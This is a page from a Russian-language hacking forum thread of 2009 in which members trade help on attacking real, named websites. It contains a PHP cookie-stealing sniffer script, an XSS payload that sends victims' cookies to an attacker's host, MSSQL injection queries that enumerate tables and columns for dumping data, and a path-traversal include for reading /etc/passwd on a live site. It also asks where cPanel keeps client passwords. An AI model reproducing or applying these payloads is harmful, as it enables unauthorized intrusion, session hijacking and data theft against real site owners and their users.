HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 565 из 2422 « Первая < 65465515555 561 562 563 564 565 566 567 568 569 57561566510651565 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.02.2009, 23:28
Sosok
Новичок
Регистрация: 16.02.2009
Сообщений: 10
С нами: 9068957

Репутация: 8
По умолчанию
htt p://cardz.ru/index.php?rasd=oplata&type=1'
Можете посмотреть эту скуля или нет , а то не могу понять!
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 26.02.2009, 23:30
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Sosok, нет, не скуля.
при скуле будет немного другая ошибка.
 
Ответить с цитированием

  #3  
Старый 26.02.2009, 23:34
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию
Sosok, это ошибка в самом скрипте, она не вызвана кавычкой...
http://cardz.ru/index.php?rasd=oplata&type=1
=
http://cardz.ru/index.php?rasd=oplata&type=1'
 
Ответить с цитированием

  #4  
Старый 27.02.2009, 17:27
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
Начёт сниффера.Код взял с форума:

<?php


$date = date('d.m.y - H:i:s');
$ip = UrlDecode(getenv('REMOTE_ADDR'));
$referer = UrlDecode(getenv('HTTP_REFERER'));
$query = UrlDecode(getenv('QUERY_STRING'));
$cookie=getenv('HTTP_COOKIE');

$s = fopen("C:\Program Files\VertrigoServ\www\cookies.txt","w");

if($s) {

echo "Successfully opened!";
fputs($s,$cookie);
echo "\n";
fputs($s,$ip);

}

else {

echo "У нас праблемы...";

}


?>

Также есть XSS на одном сайте.Как нужно обратиться к скрипту,чтобы он записал данные ?

"<script%0A%0D>s=new Image();s.src="http://my_ip/sniffer.php?"+document.cookie%3B</script>

Где my_ip - мой Ip адрес).На серве лежит скрипт sniffer.php. В фаил ничего не записалось,вот я и подумал,что обращаюсь к скрипту неправильно.
 
Ответить с цитированием

  #5  
Старый 28.02.2009, 16:14
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами: 9361870

Репутация: 58
По умолчанию
при составлении запроса в mssql inj приходится сначала кодировать в чар а потом с помощью урл код)) естественно чтоб узнать все таблы запрос будет длинным.. и обрезается(( как поступить?
 
Ответить с цитированием

  #6  
Старый 28.02.2009, 20:32
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию
Цитата:
Сообщение от j0ker13  
при составлении запроса в mssql inj приходится сначала кодировать в чар а потом с помощью урл код)) естественно чтоб узнать все таблы запрос будет длинным.. и обрезается(( как поступить?
SELECT TOP 1 TABLE_NAME FROM inofrmation_schema.TABLES WHERE TABLE_NAME NOT IN(SELECT TOP x++ TABLE_NAME FROM inofrmation_schema.TABLES ORDER BY TABLE_NAME) ORDER BY TABLE_NAME
 
Ответить с цитированием

  #7  
Старый 28.02.2009, 19:18
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию
кто знает где пассы клиентов в cPanel .. или каждый хостер делает свое?
 
Ответить с цитированием

  #8  
Старый 28.02.2009, 23:27
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами: 9361870

Репутация: 58
По умолчанию
2razor
работает) но как можно по аналогии вытащить имена колонок?)
Цитата:
(SELECT TOP 1 column_NAME FROM information_schema.columns WHERE table_name='tbllogin' and column_NAME NOT IN(SELECT TOP 3 column_NAME FROM information_schema.columns ORDER BY column_NAME) ORDER BY column_NAME)
и если выводит данные из таблицы ... where id=2... почему запрос проходит без ошибок? или какие еще способы есть сдампить удаленно?
 
Ответить с цитированием

  #9  
Старый 01.03.2009, 13:59
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию
Цитата:
Сообщение от j0ker13  
2razor
работает) но как можно по аналогии вытащить имена колонок?)
SELECT TOP 1 COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='tbl' AND COLUMN_NAME NOT IN(SELECT TOP x COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='tbl' ORDER BY COLUMN_NAME) ORDER BY COLUMN_NAME
 
Ответить с цитированием

  #10  
Старый 01.03.2009, 01:28
u36a
Познающий
Регистрация: 18.11.2008
Сообщений: 53
С нами: 9199661

Репутация: 10
По умолчанию
Можно ли как-то раскрутить пхпинклюд http://volkswagen.msk.ru/?p=../../../../../../../../../../etc/passwd%00 ? Стандартные методы не работают))
 
Ответить с цитированием
Ответ
Страница 565 из 2422 « Первая < 65465515555 561 562 563 564 565 566 567 568 569 57561566510651565 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.